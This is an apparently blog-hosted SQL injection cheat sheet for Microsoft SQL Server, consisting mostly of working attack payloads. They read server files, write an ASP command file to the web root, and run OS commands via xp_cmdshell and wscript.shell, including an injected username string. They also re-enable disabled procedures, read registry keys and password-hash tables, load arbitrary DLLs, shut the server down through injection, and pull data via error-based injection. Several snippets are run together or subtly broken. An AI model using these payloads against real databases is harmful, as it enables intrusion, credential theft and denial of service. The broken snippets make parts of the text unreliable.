Bulk Insert (S)
Insert a file content to a table. If you don't know internal path of web application you can read IIS (IIS 6 only) metabase file (%systemroot%\system32\inetsrv\MetaBase.xml) and then search in it to identify application path.- Create table foo( line varchar(8000) )
- bulk insert foo from 'c:\inetpub\wwwroot\login.asp'
- Drop temp table, and repeat for another file.
BCP (S)
Write text file. Login Credentials are required to use this function.bcp "SELECT * FROM test..foo" queryout  c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar VBS, WSH in SQL Server (S)
You can use VBS, WSH scripting in SQL Server because of ActiveX support.declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec  sp_oamethod @o, 'run', NULL, 'notepad.exe'
Username:  '; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o,  'run', NULL, 'notepad.exe' --
Executing system commands, xp_cmdshell (S)
Well known trick, By default it's disabled in SQL Server 2005. You need to have admin access.EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'Simple ping check (configure your firewall or sniffer to identify request before launch it),
EXEC master.dbo.xp_cmdshell 'ping <ip address>'You can not read results directly from error or union or something else.
Some Special Tables in SQL Server (S)
- Error Messagesmaster..sysmessages
- Linked Serversmaster..sysservers
- Password (2000 and 20005 both can be crackable, they use very similar  hashing algorithm )
 SQL Server 2000:masters..sysxlogins
 SQL Server 2005 :sys.sql_logins
More Stored Procedures for SQL Server (S)
- Cmd Execute (xp_cmdshell)
 exec master..xp_cmdshell 'dir'
- Registry Stuff (xp_regread)- xp_regaddmultistring
- xp_regdeletekey
- xp_regdeletevalue
- xp_regenumkeys
- xp_regenumvalues
- xp_regread
- xp_regremovemultistring
- xp_regwrite
 exec xp_regread HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters', 'nullsessionshares'
 exec xp_regenumvalues HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\snmp\parameters\validcommunities'
 
- Managing Services (xp_servicecontrol)
- Medias (xp_availablemedia)
- ODBC Resources (xp_enumdsn)
- Login mode (xp_loginconfig)
- Creating Cab Files (xp_makecab)
- Domain Enumeration (xp_ntsec_enumdomains)
- Process Killing (need PID)  (xp_terminate_process)
- Add new procedure (virtually you can execute whatever you  want)
 sp_addextendedproc 'xp_webserver', 'c:\temp\x.dll'
 exec xp_webserver
- Write text file to a UNC or an internal path (sp_makewebtask)
MSSQL Bulk Notes
SELECT * FROM master..sysprocesses /*WHERE spid=@@SPID*/ DECLARE @result int; EXEC @result = xp_cmdshell 'dir *.exe';IF (@result  = 0) SELECT 0 ELSE SELECT 1/0HOST_NAME()
IS_MEMBER (Transact-SQL)
IS_SRVROLEMEMBER (Transact-SQL)
OPENDATASOURCE (Transact-SQL)
INSERT tbl EXEC master..xp_cmdshell OSQL /Q"DBCC SHOWCONTIG"OPENROWSET (Transact-SQL) - http://msdn2.microsoft.com/en-us/library/ms190312.aspx
You can not use sub selects in SQL Server Insert queries.
SQL Injection in LIMIT (M) or ORDER (MSO)
SELECT id, product FROM test.test t LIMIT 0,0 UNION ALL SELECT  1,'x'/*,10 ;If injection is in second limit you can comment it out or use in your union injection
Shutdown SQL Server (S)
When you really pissed off,';shutdown -- Enabling xp_cmdshell in SQL Server 2005
By default xp_cmdshell and couple of other potentially dangerous stored procedures are disabled in SQL Server 2005. If you have admin access then you can enable these.
EXEC sp_configure 'show advanced options',1
RECONFIGUREEXEC sp_configure 'xp_cmdshell',1
RECONFIGUREFinding Database Structure in SQL Server (S)
Getting User defined Tables
SELECT name FROM sysobjects WHERE xtype = 'U'Getting Column Names
SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE  name = 'tablenameforcolumnnames')Moving records (S)
- Modify WHERE and use NOT INorNOT EXIST,... WHERE users NOT IN ('First User', 'Second User')SELECT TOP 1 name FROM members WHERE NOT EXIST(SELECT TOP 0 name FROM members)-- very good one
- Using Dirty TricksSELECT * FROM Product WHERE ID=2 AND 1=CAST((Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE i.id<=o.id) AS x, name from sysobjects o) as p where p.x=3) as int
 Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE xtype='U' and i.id<=o.id) AS x, name from sysobjects o WHERE o.xtype = 'U') as p where p.x=21
Fast way to extract data from Error Based SQL Injections in SQL Server (S)
';BEGIN DECLARE @rt varchar(8000) SET @rd=':' SELECT  @rd=@rd+' '+name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name  = 'MEMBERS') AND name>@rd SELECT @rd AS rd into TMP_SYS_TMP  end;-- 


ليست هناك تعليقات:
إرسال تعليق